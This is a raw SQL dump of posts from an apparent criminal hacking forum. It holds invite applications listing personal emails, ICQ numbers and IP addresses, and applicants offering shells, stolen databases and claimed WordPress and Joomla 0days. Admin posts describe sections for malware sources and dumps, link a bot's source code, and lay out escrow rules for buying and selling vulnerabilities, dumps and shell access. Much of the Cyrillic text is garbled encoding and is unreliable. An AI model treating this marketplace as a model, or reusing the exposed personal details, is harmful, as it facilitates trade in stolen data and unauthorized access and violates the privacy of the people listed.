(1025, 1022, 0, 'w0rm', 1, 'Read.Me', 1403404742, '[b]æõûь фþруüð[/b]:\n\n - ÚþþрôøýðцøѠúþüðýôы w0rm.pw\n - Þñüõý þÿытþü ø ðúтуðûьýþù øýфþрüðцøõù\n - ßþôóþтþòúð ø ôþрðñþтúø úþýтõýтð ôûѠþÑÂýþòýþóþ рõÑÂурÑÂð\n\n[B]invites[/B]\n\n - à ð÷ôõû ôûѠÿрøõüð ÷ðÑÂòþú Ѡфþрüы /join\n - ßþÑÂûõ ÿþôðчø ÷ðÑÂòúø øýфþрüðцøѠÿðôðõт ò ÷ð÷ôõû [B]new[/B]\n - à ðÑÂÑÂüþтрõýýыõ ø ðúтøòøрþòðýýыõ ÷ðÑÂòúø ûõöðт ò рð÷ôõûõ [B]activated[/B]\n \n[b]project[/b]\n\n - à ð÷ôõû ôûѠÿуñûøúðцøø ýþòþÑÂтõù ÿрþõúтð aka [b]news[/b]\n\n[B]security[/B]\n\n - Ã’ÑÂõ чтþ úðÑÂðõтÑÂѠñõ÷þÿðÑÂýþÑÂтø\n - ãÑÂ÷òøüþÑÂтø ò òÑÂñ ôòøöúðх, ÑÂþòüõÑÂтýðѠрðÑÂúрутúð рõÑÂурÑÂþò ø÷ ÷ðúð÷þò, etc [b]remote[/b]\n - 0day-ø, ûþúðûьýыõ ÑÂÿûþøты, ÿрþÑÂьñð ÿþüþчь ò ÿþòышõýøø ÿрðò, etc [b]local[/b]\n - áûøтыõ øýтõрõÑÂýыõ ôðüÿы [b]dumps[/b]\n\n[b]coding[/b]\n\n - à ð÷ôõû ÿрþóрðüüøрþòðýøÑÂ\n - ØÑÂхþôýыõ úþôы ÿрþóрðüü/malware/øýтõрõÑÂýых ÑÂúрøÿтþò - [b]source[/b]\n - ÃÂðÿøÑÂðýøõ/рõòõрÑÂøýó/ôõñðó/etc - [b]develop[/b]', 1, 0, '141.101.92.74', 0, 1, 0, 0, 0),
(962, 961, 0, 'Invite', 2, 'New invite', 1401623938, '[b]Name[/b]: Karalkan\r\n [b]Age[/b]: 32\r\n [b]ICQ[/b]: 727446\r\n [b]e-mail[/b]: karalkan@yandex.ru\r\n [b]Info[/b]: http://forum.antichat.ru/member.php?userid=101155\r\nhttp://searchengines.guru/member.php?u=77965\r\nÃà äà ÃÃûé ìîìåÃò\r\náîëüøå îáùà þñü Ãà \r\nbablorub.ru Ãèê\r\nKaralkan.', 1, 0, '173.245.53.141', 0, 1, 0, 0, 0),
(963, 962, 0, 'Invite', 2, 'New invite', 1401624142, '[b]Name[/b]: Karalkan\r\n [b]Age[/b]: 32\r\n [b]ICQ[/b]: 727446\r\n [b]e-mail[/b]: karalkan@yandex.ru\r\n [b]Info[/b]: http://forum.antichat.ru/member.php?userid=101155\r\nhttp://searchengines.guru/member.php?u=77965\r\n äà ÃÃûé ìîìåÃò\r\náîëüøå îáùà þñü Ãà \r\nbablorub.ru Ãèê\r\nKaralkan êà ðìà , 1.55\r\nÃà âà øåì ôîðóìå\r\nõîòåëà áû\r\nïðèîáðåòà òü\r\nóÿçâèìîñòè ïîä WP è\r\näð. ðà ñïðîñòðà ÃÃ¥ÃÃûõ\r\näâèæêîâ.\r\nÑïà ñèáî..', 1, 0, '173.245.53.141', 0, 1, 0, 0, 0),
(965, 964, 0, 'Invite', 2, 'New invite', 1401628090, '[b]Name[/b]: PoZZ\r\n [b]Age[/b]: 30\r\n [b]ICQ[/b]: \r\n [b]e-mail[/b]: Vkusni@hotmail.com\r\n [b]Info[/b]: Searching bugs in web-scripts. SQLi, LFI, RFI, RCE. Rooting&shelling.\r\nJabber: pozz@exploit.im.', 1, 0, '141.101.98.29', 0, 1, 0, 0, 0),
(966, 965, 0, 'Invite', 2, 'New invite', 1401633335, '[b]Name[/b]: b82a\r\n [b]Age[/b]: 19\r\n [b]ICQ[/b]: 338732\r\n [b]e-mail[/b]: banana@xakep.ru\r\n [b]Info[/b]: https://rdot.org/forum/member.php?u=49\r\nhttps://exploit.in/forum/index.php?showuser=47663.', 1, 0, '141.101.99.219', 0, 1, 0, 0, 0),
(967, 966, 0, 'Invite', 2, 'New invite', 1401633486, '[b]Name[/b]: Ph0enix\r\n [b]Age[/b]: -\r\n [b]ICQ[/b]: JID: ph0enix@armada.im\r\n [b]e-mail[/b]: ph0enix@mailinator.com\r\n [b]Info[/b]: .', 1, 0, '141.101.98.32', 0, 1, 0, 0, 0),
(991, 989, 0, 'Invite', 2, 'New invite', 1401974412, '[b]Name[/b]: Your name\r\n [b]Age[/b]: Age\r\n [b]ICQ[/b]: icq\r\n [b]e-mail[/b]: e-mail\r\n [b]Info[/b]: .', 1, 0, '141.101.104.241', 0, 1, 0, 0, 0),
(969, 968, 0, 'Invite', 2, 'New invite', 1401639433, '[b]Name[/b]: cmpro\r\n [b]Age[/b]: 25\r\n [b]ICQ[/b]: 774665\r\n [b]e-mail[/b]: otherways@safe-mail.net\r\n [b]Info[/b]: sql inj\r\nphp inj.', 1, 0, '173.245.53.203', 0, 1, 0, 0, 0),
(970, 969, 0, 'Invite', 2, 'New invite', 1401643211, '[b]Name[/b]: Cawqa\r\n [b]Age[/b]: 25\r\n [b]ICQ[/b]: \r\n [b]e-mail[/b]: lunatikscale@gmail.com\r\n [b]Info[/b]: ÌîæÃî Ãà Ãóññêîì?\r\nÑèñ à äìèà WinServer 2003,2008,R2 DHCP,DNS ,MS Exchange, GFI MailEssential, \r\nWSUS, Deployment Service, System Center, ó÷óñü îñÃîâà ì ÈÃ, ðà áîòà þ, \r\nó÷à ñòâóþ â bugbounty êîãäà õâà òà åò âðåìåÃè. Õîòåëîñü áû ïðèÃÿòü ó÷à ñòèå â \r\nèÃòåðåñÃîì ïðîåêòå, äëÿ ïîëó÷åÃèÿ Ãîâûõ Ãà âûêîâ.  Ãà øåì óñòþæîïèÃñêå \r\nïðà êòè÷åñêè Ãåò ÈÒ òóñîâêè âîò è ïðèõîäèòñÿ äîáà âëÿòü ëþäåé èëè â ñêà éï èëè \r\nâ icq äëÿ îáùåÃèÿ è îáìåÃà ñîîáùåÃèÿìè.\r\n Åñòü áëîã www.evilcorp.ml Ãî âðåìåÃèå Ãà åãî ïîääåðæêó êðà éÃÃ¥ ÃÃ¥ õâà òà åò.\r\n\r\nÃó èç èÃòåðåñÃîãî ìîãó Ãà ïèñà òü\r\n\r\nhttps://communities.vmware.com/tags#/?tags=id\">\r\n\r\n\r\n.', 1, 0, '173.245.53.141', 0, 1, 0, 0, 0),
(990, 988, 0, 'Invite', 2, 'New invite', 1401974407, '[b]Name[/b]: Your name\r\n [b]Age[/b]: Age\r\n [b]ICQ[/b]: icq\r\n [b]e-mail[/b]: e-mail\r\n [b]Info[/b]: .', 1, 0, '141.101.104.241', 0, 1, 0, 0, 0),
(989, 987, 0, 'Invite', 2, 'New invite', 1401974405, '[b]Name[/b]: Your name\r\n [b]Age[/b]: Age\r\n [b]ICQ[/b]: icq\r\n [b]e-mail[/b]: e-mail\r\n [b]Info[/b]: .', 1, 0, '141.101.104.241', 0, 1, 0, 0, 0),
(973, 972, 0, 'Invite', 2, 'New invite', 1401656296, '[b]Name[/b]: ali\r\n [b]Age[/b]: 26\r\n [b]ICQ[/b]: \r\n [b]e-mail[/b]: ali_sniffer@yahoo.com\r\n [b]Info[/b]: Hello\r\ni am leno from iran\r\ni need invite code.', 1, 0, '141.101.98.239', 0, 1, 0, 0, 0),
(1022, 1019, 0, 'Invite', 2, 'New invite', 1403342757, '[b]Name[/b]: Dictator\r\n [b]Age[/b]: 18\r\n [b]ICQ[/b]: 29\r\n [b]e-mail[/b]: dictator.bh@gmail.com\r\n [b]Info[/b]: .', 1, 0, '173.245.54.232', 0, 1, 0, 0, 0),
(1024, 1021, 0, 'w0rm', 1, 'src fbot', 1403402926, 'src fbot\r\n\r\n[some info]\r\n\r\n[URL=\"https://www.dropbox.com/s/dg3rq9zievddyxq/fbot.7z\"]download[/URL]', 1, 0, '141.101.92.74', 0, 1, 0, 0, 0),
(975, 974, 0, 'Invite', 2, 'New invite', 1401680435, '[b]Name[/b]: kancha\r\n [b]Age[/b]: 21\r\n [b]ICQ[/b]: icq\r\n [b]e-mail[/b]: kancha_exploit@hotmail.com\r\n [b]Info[/b]: .', 1, 0, '108.162.225.129', 0, 1, 0, 0, 0),
(979, 978, 0, 'Invite', 2, 'New invite', 1401712607, '[b]Name[/b]: Balanda\r\n [b]Age[/b]: 99\r\n [b]ICQ[/b]: 2002200\r\n [b]e-mail[/b]: micheladrian294@yahoo.com\r\n [b]Info[/b]: The most important field. Here you must specify the field of self-related \r\nknowledge of IT, their skills in various areas, their achievements, releases, \r\nprofiles on famous it-portals, the possible usefulness of the project, and so \r\non. A small description of yourself welcome. You can also leave a jabber \r\nand other alternative addresses to communicate, in a word, everything that \r\nyou think it necessary to bring to our attention. The minimum length of 200 \r\ncharacters, the maximum 4000..', 1, 0, '141.101.98.24', 0, 1, 0, 0, 0),
(980, 979, 0, 'Invite', 2, 'New invite', 1401714082, '[b]Name[/b]: Psych0tr1a\r\n [b]Age[/b]: 37\r\n [b]ICQ[/b]: 277777777\r\n [b]e-mail[/b]: w@inbox.ru\r\n [b]Info[/b]: .', 1, 0, '173.245.53.171', 0, 1, 0, 0, 0),
(982, 980, 0, 'w0rm', 1, 'ßрðòøûð.', 1401725665, '[B]ru[/B]\n\n[QUOTE]\nÓруÿÿы ÿрðò ø ôþÑÂтуÿы\n\náущõÑÂтòуõт 3 óруÿÿы ÿрðò:\n\n[B]ÃÂôüøýøÑÂтрðтþр[/B]\n\nÞтûøчøõ þт þÑÂтðûьýых óруÿÿ : \n\nØüõõт ôþÑÂтуÿ ú ýþòыü ÷ðÑÂòúðü ýð рðÑÂÑÂüþтрõýøõ.\nØüõõт òþ÷üþöýþÑÂть ôþñðòÃȄÂть ðúúðуýты ò 3 ÑÂущõÑÂтòующøõ óруÿÿы, ðúтøòøрþòðть ø ôõðúтøòøрþòðть øх.\n\n[B]ãчðÑÂтýøú[/B] \n\nÓруÿÿð ÑÂþ÷ôðýð ôûѠûюôõù þñûðôðющøх ôþÑÂтðтþчýыüø ÷ýðýøÑÂüø ò þñûðÑÂтø øýфþрüðцøþýýþù ñõ÷þÿðÑÂýþÑÂтø, òыòþôы ôõûðютÑÂѠýð þÑÂýþòõ øýфþрüðцøø ÿþôðýþù ò ÷ðÑÂòúõ ø ÿуñûøчýых üðтõрøðûþò ýð тõüðтøчõÑÂúøх ÿûþщðôúðх.\n\nãчðÑÂýøú øüõõт ÿрðòþ ÑÂþ÷ôðòðть ø рõôðúтøрþòðть ÿрþõúты, ÿрøûðóðть òûþöõýøÑÂ, òыñþрþчýþ ÿрøóûðшðть ÿþûь÷þòðтõûõù ø÷ óруÿÿ ÷ðúð÷чøú/ðôüøýøÑÂтрðтþр.\n\n[B]×ðúð÷чøú [/B]\n\n\nÓруÿÿð ÑÂþ÷ôðýð ôûѠûюôõù þñûðôðющøх ñõ÷уúþрø÷ýõýýþù рõÿутðцøõù , òыòþôы ôõûðютÑÂѠýð þÑÂýþòõ øýфþрüðцøø ÿþôðýþù ò ÷ðÑÂòúõ, ûøчýþóþ þÿытð ÿрþòõôõýøѠÑÂôõûþú ø ÿуñûøчýых тõüðх ýð тõüðтøчõÑÂúøх ÿûþщðôúðх.\n\n×ðúð÷чøú øüõõт ÿрðòþ ÑÂþ÷ôðòðть ø рõôðúтøрþòðть ÷ðúð÷ы, òыñþрþчýþ ÿрøóûðшðть ÿþûь÷þòðтõûõù ø÷ óруÿÿ учðÑÂýøú/ðôüøýøÑÂтрðтþр.\n\nßрðòøûð ÿуñûøúðцøø\n\n×ðóþûþòþú ÷ðúð÷ð ôþûöõý ÑÂþôõрöðть ýð÷òðýøõ рõÑÂурÑÂð ø ÑÂуüüу úþтþрую òы óþтþòы ÷ðÿûðтøть ÷ð рõ÷уûьтðт.\n\nßрøüõр: \n\n[CODE]ya.ru xss (500$);[/CODE]\n\nÞÿøÑÂðýøõ ÿрþø÷òþûьýþ.\n\nßрøüõр ÿуñûøúðцøø ýð ÿрþôðöу уÑÂ÷òøüþÑÂтõù/ôðüÿþò/шõûþò\n\n×ðóþûþòþú: \n[CODE]validshop dump (1000$);[/CODE]\n\nâõûþ: \n[CODE]ßрþôðü ôðüÿ ñô þт *ôðтð*, *ÑÂтруúтурð_ñô*, *чðÑÂть_ôðüÿð*, *úþûøчõÑÂтòþ úþÿøù úþтþрþõ ÿûðýøруõтÑÂѠÿрþôðть*.[/CODE]\n\nÃâ€Ã»Ñ ÑˆÃµÃ»Ã¾Ã²:\n[CODE] ØýфþрüðцøѠþñ Þá, úþû-òþ трðфøúð, тøÿ рõÑÂурÑÂð ø тô.\n[/CODE]\n\nÃâ€ÃȄʄĄÂ÷òøüþÑÂтõù:\n[CODE] ÒõрÑÂøѠÿрþôуúтð, ýðûøчøõ ÑÂúÑÂÿûþøтð, тøÿ уÑÂ÷òøüþÑÂтø.\n[/CODE]\nÃÂрñøтрðö ø óðрðýт\n\nßрþòõôõýýыõ ÑÂôõûúø ñõ÷ учðÑÂтøѠðôüøýøÑÂтрðцøø ýõ ñуôут рðÑÂÑÂüðтрøòðтьÑÂÑÂ.\n\nßþрÑÂôþú ÿрþòõôõýøѠÑÂôõûúø:\n\n[LIST]\n[*]ãчðÑÂтýøú ø ÷ðúð÷чøú ÑÂþþñщðю ÑÂÑÂыûúу ýð тõüу ò ñøрöõ ûюñþüу ø÷ ðôüøýøÑÂтрðтþрþò.\n[*]ãчðÑÂтýøú ÿõрõôðõт уÑÂ÷òøüþÑÂть/ôðüÿ/шõûû ðôüøýøÑÂтрðтþру.\n[*]ÃÂôüøýøÑÂтрðтþр ÿрþòõрÑÂõт ýð òðûøôýþÑÂть ÿрõôþÑÂтðòûõýýую øýфþрüðцøю.\n[*]áþþñщðõт рõ÷уûьтðт ÷ðúð÷чøúу.\n[*]×ðúð÷чøú ÿõрõòþôøт ÑÂрõôÑÂтòð учðÑÂтýøúу.\n[*]ÃÂôüøýøÑÂтрðтþр ÿõрõôðõт уÑÂ÷òøüþÑÂть/ôðüÿ/шõû ÷ðúð÷чøúу.\n[/LIST]\n\n[b]×ðÿрõщðõтÑÂÑÂ[/b]\n\n[LIST]\n[*]ßõрõôðòðть ðúúðуýт трõтьøü ûøцðü.\n[*]à ð÷óûþшõýøõ ÿõрÑÂþýðûьýых ôðýýых учðÑÂýøúþò ÿрþõúтð.\n[*]à ðÑÂÿрþÑÂтрðýÑÂть øýфþрüðцøю þ ÷ðúð÷ðх ýð ðуôøт ø òыÑÂтðòûõýýых ýð ÿрþôðöу уÑÂ÷òøüþÑÂÑ‚ÑÂÑ…, úðú ýþòых тðú ø ÷ðòõршõýýых.\n[*]Ãâ€ÃµÑ„ÑÂùÑÂÑ‹ ÿрÑÂüþ øûø úþÑÂòõýýþ уúð÷ыòðющøõ ýð ÿрøýðôûõöýþÑÂть òðѠú ÿрþõúту.\n[*]ßуñûøúþòðть ÷ðòõôþüþ ûþöýую/ÿуñûøчýую øýфþрüðцøю ú ÿрþôðöõ.\n[*]ßþÿытúø ò÷ûþüð ø ûюñыõ ôруóøõ ôõùÑÂтòøѠýõÑÂущøõ òрõô ÿрþõúту.\n[/LIST]\nÜõрð ýðúð÷ðýøѠõôøýð ôûѠòÑÂõх : ñðý ñõ÷ ÿрðòð òþ÷òрðтð òýõÑÂõýýых ÑÂрõôÑÂтò ÿрø рõóøÑÂтрðцøø.\n\n\n\nÚþýтðúт: [email]w0rm@cih.ms[/email]\n[/QUOTE] \n\n\n\n\n[B]eng[/B] (Google translate);\n\n[QUOTE]\nGroup rights and access \n\nThere are 3 groups of rights: \n\n[B] Administrator [/B] \n\nUnlike the other groups: \n\nHas access to new applications for consideration. \nHas the ability to add accounts to the 3 existing groups, activate and deactivate them. \n\n[B] Member [/B] \n\nThe group was created for people with sufficient knowledge in the field of information security, the conclusions are based on the information filed in the application and public materials on thematic areas. \n\nThe participant has the right to create and edit projects, make investments, selectively invite users from the customer / administrator. \n\n[B] Customer [/B] \n\n\nThe group was created for people to have an excellent reputation, the conclusions are based on the information filed in the application, the personal experience of the transactions and the public on the topics of the thematic areas. \n\nCustomer has the right to create and edit orders, selectively invite users group The participant / administrator. \n\nTerms of publication \n\nOrder header must contain the name of the resource and the amount you are willing to pay for results. \n\nExample: \n\n[CODE] ya.ru xss (500 $); [/CODE] \n\nDescription arbitrarily. \n\nExample publications for sale vulnerabilities / dumps / Shelov \n\nTitle: \n[CODE] validshop dump (1000 $); [/CODE] \n\nbody: \n[CODE] Buy database dump from * date *, * struktura_bd *, * chast_dampa *, * the number of copies that will be sold *. [/CODE] \n\nFor Shelov: \n[CODE] Information about the operating system, traffic count, resource type, and so on. \n[/CODE] \n\nFor vulnerabilities: \n[CODE] version of the product, the availability of exploit, the type of vulnerability. \n[/CODE] \nArbitration and guarantor \n\nTransactions conducted without the participation of the administration will not be considered. \n\nThe order of execution of the transaction: \n\n[LIST] \n[*] Member and inform the customer a link to a topic in any of the Exchange administrators. \n[*] Shall deposit a vulnerability / dump / shell administrator. \n[*] The administrator checks the validity of the information provided. \n[*] Reports the results to the customer. \n[*] Customer transfers funds to the participant. \n[*] Administrator transmits vulnerability / dump / walked to the customer. \n[/LIST] \n\n[b] Do not [/b] \n\n[LIST] \n[*] Pass account to third parties. \n[*] Razgloshenie personal data of participants of the project. \n[*] Disseminate information on orders for audit and for sale vulnerabilities, both new and completed. \n[*] Defeysy directly or indirectly pointing to you belong to the project. \n[*] Post a deliberately false / public information to sell. \n[*] Hacking attempts and any other supporting actions harm the project. \n[/LIST] \nThe penalty is the same for all: a ban without the right of return of contributions received during registration. \n\n\n\nContact: [email] w0rm@cih.ms [/email]\n[/QUOTE]', 1, 0, '141.101.70.145', 0, 1, 0, 0, 0),
(916, 916, 0, 'Invite', 2, 'New invite', 1401336639, '[b]Name[/b]: Your nameMuhammad Leonard \r\n [b]Age[/b]: Age24\r\n [b]ICQ[/b]: icq\r\n [b]e-mail[/b]: leonardarakasamy@gmail.com\r\n [b]Info[/b]: .', 1, 0, '108.162.225.117', 0, 1, 0, 0, 0),
(917, 917, 0, 'Invite', 2, 'New invite', 1401336674, '[b]Name[/b]: Your nameMuhammad Leonard \r\n [b]Age[/b]: Age24\r\n [b]ICQ[/b]: icq\r\n [b]e-mail[/b]: leonardarakasamy@gmail.com\r\n [b]Info[/b]: .', 1, 0, '108.162.225.117', 0, 1, 0, 0, 0),
(992, 990, 0, 'Invite', 2, 'New invite', 1401978376, '[b]Name[/b]: m3dusa\r\n [b]Age[/b]: 22\r\n [b]ICQ[/b]: \r\n [b]e-mail[/b]: andrewsamwad@gmail.com\r\n [b]Info[/b]: .', 1, 0, '103.22.201.148', 0, 1, 0, 0, 0),
(919, 919, 0, 'Invite', 2, 'New invite', 1401342899, '[b]Name[/b]: Dark Pureblood\r\n [b]Age[/b]: 27\r\n [b]ICQ[/b]: icq\r\n [b]e-mail[/b]: minionsbrain@gmail.com\r\n [b]Info[/b]: Website Developer and teaching computer-related subject in a college \r\neducation... Love to read computer-related blogs and magazines. Studying \r\nmysql injection, cross-site scripting, and any related penetration testing to \r\ncheck my own developed websites. Try to communicate with others to learn \r\nand share knowledge in IT industry..', 1, 0, '108.162.225.116', 0, 1, 0, 0, 0),
(921, 921, 0, 'Invite', 2, 'New invite', 1401346008, '[b]Name[/b]: moloko\r\n [b]Age[/b]: 35\r\n [b]ICQ[/b]: 451234\r\n [b]e-mail[/b]: mik.jackson@post.cz\r\n [b]Info[/b]: Im a buyer of shell\r\naccess..', 1, 0, '141.101.70.85', 0, 1, 0, 0, 0),
(922, 922, 0, 'Invite', 2, 'New invite', 1401346447, '[b]Name[/b]: sds21v\r\n [b]Age[/b]: my3vettes\r\n [b]ICQ[/b]: 631354\r\n [b]e-mail[/b]: sds21v@mail.ru\r\n [b]Info[/b]: .', 1, 0, '173.245.56.77', 0, 1, 0, 0, 0),
(923, 923, 0, 'Invite', 2, 'New invite', 1401348770, '[b]Name[/b]: qwer123\r\n [b]Age[/b]: 28\r\n [b]ICQ[/b]: 672085318\r\n [b]e-mail[/b]: maraclara634@gmail.com\r\n [b]Info[/b]: .', 1, 0, '173.245.53.151', 0, 1, 0, 0, 0),
(926, 926, 0, 'Invite', 2, 'New invite', 1401381777, '[b]Name[/b]: recfrf\r\n [b]Age[/b]: 0\r\n [b]ICQ[/b]: 823392\r\n [b]e-mail[/b]: recfrf444@gmail.com\r\n [b]Info[/b]: .', 1, 0, '173.245.53.221', 0, 1, 0, 0, 0),
(927, 927, 0, 'Invite', 2, 'New invite', 1401384050, '[b]Name[/b]: Snafy\r\n [b]Age[/b]: 17\r\n [b]ICQ[/b]: icq\r\n [b]e-mail[/b]: A_o7@hotmail.com\r\n [b]Info[/b]: .', 1, 0, '173.245.53.145', 0, 1, 0, 0, 0),
(928, 928, 0, 'Invite', 2, 'New invite', 1401390423, '[b]Name[/b]: Mrow\r\n [b]Age[/b]: 30\r\n [b]ICQ[/b]: deifirev@default.rs\r\n [b]e-mail[/b]: e-mail1@mailinator.com\r\n [b]Info[/b]: .', 1, 0, '173.245.53.138', 0, 1, 0, 0, 0),
(956, 955, 0, 'Invite', 2, 'New invite', 1401598131, '[b]Name[/b]: madhatter\r\n [b]Age[/b]: 27\r\n [b]ICQ[/b]: \r\n [b]e-mail[/b]: milo_tindle@yahoo.com\r\n [b]Info[/b]: Jid:\r\nmadhatter@default.rs\r\n\r\nLinks to profiles:\r\nhttps://exploit.in/forum/index.php?showuser=53465\r\nhttps://forum.antichat.ru/member.php?u=246887\r\nhttps://rdot.org/forum/member.php?u=5583\r\n\r\nLampeduza, crdclub,\r\nkorovka, darkmoney,\r\nhackzone, hpc, - on\r\nrequest.\r\n\r\nWilling to sell\r\nacquired DBs, shells\r\nand so on. Also I\'m\r\ninterested in\r\nproviding access to\r\ntargets, as\r\nmentioned in\r\nexploin.in\r\ntopic(https://exploit.in/forum/index.php?showtopic=79370&hl=).\r\n\r\nPlease notify in\r\njabber about\r\naccepting/declining\r\nthis request..', 1, 0, '141.101.70.163', 0, 1, 0, 0, 0),
(930, 930, 0, 'Invite', 2, 'New invite', 1401412714, '[b]Name[/b]: Your name الشبح الليبي \r\n [b]Age[/b]: 20\r\n [b]ICQ[/b]: https://twitter.com/LY_ghost\r\n [b]e-mail[/b]: ly.ghost94@gmail.com\r\n [b]Info[/b]: .', 1, 0, '141.101.88.77', 0, 1, 0, 0, 0),
(931, 931, 0, 'Invite', 2, 'New invite', 1401412763, '[b]Name[/b]: ly.ghost\r\n [b]Age[/b]: 20\r\n [b]ICQ[/b]: 7987897\r\n [b]e-mail[/b]: ly.ghost94@gmail.com\r\n [b]Info[/b]: .', 1, 0, '141.101.88.77', 0, 1, 0, 0, 0),
(932, 932, 0, 'Invite', 2, 'New invite', 1401412996, '[b]Name[/b]: ly.ghost\r\n [b]Age[/b]: 20\r\n [b]ICQ[/b]: 697073910\r\n [b]e-mail[/b]: ly.ghost94@gmail.com\r\n [b]Info[/b]: .', 1, 0, '141.101.88.77', 0, 1, 0, 0, 0),
(933, 933, 0, 'Invite', 2, 'New invite', 1401431371, '[b]Name[/b]: qwer123\r\n [b]Age[/b]: 28\r\n [b]ICQ[/b]: 672085318\r\n [b]e-mail[/b]: maraclara634@gmail.com\r\n [b]Info[/b]: .', 1, 0, '173.245.53.151', 0, 1, 0, 0, 0),
(955, 954, 0, 'Invite', 2, 'New invite', 1401585919, '[b]Name[/b]: Andy\r\n [b]Age[/b]: 27\r\n [b]ICQ[/b]: prsss@xabber.de\r\n [b]e-mail[/b]: bansolik@mail.com\r\n [b]Info[/b]: SQL|LFI|RFI pentester 5+ years experience\r\nASP\\PHP coder\r\nSome experience in Social Engineering\r\nGot lots shell\'s and vulnerabilities on top 10k alexa sites\r\nExperience in user privilege escalation.\r\nExperience in penetetration to corporate networks\r\nHave joomla and WP 0days..', 1, 0, '141.101.99.37', 0, 1, 0, 0, 0),
(938, 937, 0, 'Invite', 2, 'New invite', 1401473259, '[b]Name[/b]: hackdays\r\n [b]Age[/b]: 19\r\n [b]ICQ[/b]: 333936954\r\n [b]e-mail[/b]: vladimir.moroz2010@mail.ru\r\n [b]Info[/b]: .', 1, 0, '173.245.53.133', 0, 1, 0, 0, 0),
(939, 938, 0, 'Invite', 2, 'New invite', 1401475724, '[b]Name[/b]: xbillka\r\n [b]Age[/b]: 29\r\n [b]ICQ[/b]: mafioso@priv.in\r\n [b]e-mail[/b]: yand3xd1sk@yandex.com\r\n [b]Info[/b]: Security research\r\nMathematics\r\nprogramming\r\nDeep konwledge of windows internals, professional virus analyst \r\n(OllyDbg/IDA/SoftIce/...). Also C/C++/Delphi/Java/Assembler laguages are \r\nfriendly.\r\nAudit and Vuls..', 1, 0, '108.162.222.72', 0, 1, 0, 0, 0),
(940, 939, 0, 'Invite', 2, 'New invite', 1401546324, '[b]Name[/b]: justin\r\n [b]Age[/b]: 20\r\n [b]ICQ[/b]: icq\r\n [b]e-mail[/b]: tiozr@tryalert.com\r\n [b]Info[/b]: .', 1, 0, '173.245.53.175', 0, 1, 0, 0, 0),
(954, 953, 0, 'Invite', 2, 'New invite', 1401585377, '[b]Name[/b]: Andy\r\n [b]Age[/b]: 27\r\n [b]ICQ[/b]: prsss@xabber.de\r\n [b]e-mail[/b]: bansolik@mail.com\r\n [b]Info[/b]: SQL|LFI|RFI pentester 5+ years experience\r\nASP\\PHP coder\r\nSome experience in Social Engineering\r\nHave joomla and WP 0days..', 1, 0, '141.101.99.37', 0, 1, 0, 0, 0),
(942, 941, 0, 'Invite', 2, 'New invite', 1401559552, '[b]Name[/b]: Sniffer\r\n [b]Age[/b]: 29\r\n [b]ICQ[/b]: icq\r\n [b]e-mail[/b]: l2le@yahoo.com\r\n [b]Info[/b]: i am sniffer from\r\niran\r\nmy skill pentester\r\ni am member\r\nexploit.in \r\nand admin j\r\nmadleets.com\r\nand active on\r\nanother forum\r\nunderground.', 1, 0, '141.101.97.65', 0, 1, 0, 0, 0),
(943, 942, 0, 'Invite', 2, 'New invite', 1401559638, '[b]Name[/b]: Sniffer\r\n [b]Age[/b]: 29\r\n [b]ICQ[/b]: 657681435\r\n [b]e-mail[/b]: l2le@yahoo.com\r\n [b]Info[/b]: Hi\r\ni am sniffer from\r\niran\r\nmy skill pentester 7\r\nyears\r\ni am member\r\nexploit.in\r\nmy username l2le \r\ni am admin\r\nmadleets.com \r\ni need invite code\r\nregard\'s.', 1, 0, '141.101.97.65', 0, 1, 0, 0, 0),
(944, 943, 0, 'Invite', 2, 'New invite', 1401559677, '[b]Name[/b]: daim\r\n [b]Age[/b]: 27\r\n [b]ICQ[/b]: 777666\r\n [b]e-mail[/b]: technician@list.ru\r\n [b]Info[/b]: .', 1, 0, '173.245.53.185', 0, 1, 0, 0, 0),
(946, 945, 0, 'Invite', 2, 'New invite', 1401562809, '[b]Name[/b]: AIRZI\r\n [b]Age[/b]: 22\r\n [b]ICQ[/b]: 655885413\r\n [b]e-mail[/b]: musalbom@gmail.com\r\n [b]Info[/b]: .', 1, 0, '173.245.53.186', 0, 1, 0, 0, 0),
(947, 946, 0, 'Invite', 2, 'New invite', 1401562832, '[b]Name[/b]: remarka\r\n [b]Age[/b]: 29\r\n [b]ICQ[/b]: 44332\r\n [b]e-mail[/b]: xiaofudas@live.com\r\n [b]Info[/b]: .', 1, 0, '141.101.99.11', 0, 1, 0, 0, 0),
(948, 947, 0, 'Invite', 2, 'New invite', 1401562978, '[b]Name[/b]: AIRZI\r\n [b]Age[/b]: 22\r\n [b]ICQ[/b]: 655885413\r\n [b]e-mail[/b]: musalbom@gmail.com\r\n [b]Info[/b]: BBS.', 1, 0, '173.245.53.186', 0, 1, 0, 0, 0),
(949, 948, 0, 'Invite', 2, 'New invite', 1401563142, '[b]Name[/b]: remarka\r\n [b]Age[/b]: 29\r\n [b]ICQ[/b]: 44332\r\n [b]e-mail[/b]: xiaofudas@live.com\r\n [b]Info[/b]: Hello. I found your\r\ntopic on exploit.in.\r\nI love cyber\r\nsecurity. Also i`m\r\ninteresting in black\r\nseo. At most, i`m\r\nresearching big\r\nresources, with big\r\ndatabases/traffic.\r\nFor example -\r\nleagueoflegends.com,\r\nwsj.com,\r\nfilefactory.com and\r\nmany others, where i\r\nhad found\r\nvulnerabilities.\r\nI want to join your\r\ncommunity, to\r\nimprove my skills\r\nand make money.\r\nThx..', 1, 0, '141.101.99.11', 0, 1, 0, 0, 0),
(950, 949, 0, 'Invite', 2, 'New invite', 1401563845, '[b]Name[/b]: usr\r\n [b]Age[/b]: 25\r\n [b]ICQ[/b]: icq\r\n [b]e-mail[/b]: rodimov.london@gmail.com\r\n [b]Info[/b]: .', 1, 0, '141.101.89.73', 0, 1, 0, 0, 0),
(951, 950, 0, 'Invite', 2, 'New invite', 1401564546, '[b]Name[/b]: usr\r\n [b]Age[/b]: 25\r\n [b]ICQ[/b]: icq\r\n [b]e-mail[/b]: rodimov.london@gmail.com\r\n [b]Info[/b]: Ûюñûю òтыúðть ò úþô - þÑÂþñõýýþ ò чуöþù, þÑÂþñõýýþ ò úрøòþ ýðÿøÑÂðýýыù \r\n;)\r\nßрþóрðüüøрую, üýþóþ, ÿþрþù þчõýь üýþóþ. ÞÑÂýþòýþù ïß: python. âðú öõ \r\n÷ýðю c,c++, php, js. Ûюñûю Linux.\r\nßрþфøûõù ÿрþúðчðýýых ò ÿðñûøú ñþррôðх ýõт.\r\n.', 1, 0, '141.101.89.73', 0, 1, 0, 0, 0),
